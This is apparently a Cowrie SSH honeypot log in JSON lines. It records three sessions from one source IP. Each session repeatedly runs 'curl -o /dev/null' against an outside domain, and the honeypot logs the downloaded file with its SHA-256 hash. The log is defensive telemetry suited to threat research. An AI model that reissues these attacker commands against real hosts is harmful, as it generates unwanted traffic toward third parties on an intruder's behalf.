{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.761070Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.764484Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.792910Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.795640Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.798204Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.800204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.800880Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.807104Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.808064Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.809716Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.810515Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.840512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.842768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.846180Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.847818Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.849024Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.853439Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.856147Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.856565Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.860447Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.862288Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.888763Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.890692Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.893639Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.895396Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.896163Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.900585Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.901487Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.907910Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.908347Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.961241Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.963192Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.965557Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.969184Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.970145Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.970859Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.973989Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.974364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.977027Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.977895Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.978457Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.015285Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.016565Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.017824Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.021168Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.021707Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.023825Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.024351Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.058345Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.060363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.061879Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.062916Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.066234Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.066731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.076727Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.077349Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.102103Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.103963Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.105806Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.106529Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.109972Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.110788Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.113766Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.117901Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.120566Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.122403Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.123266Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.150587Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.151435Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.154895Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.155676Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.159173Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.163768Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.164823Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.192619Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.193792Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.194711Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.202455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
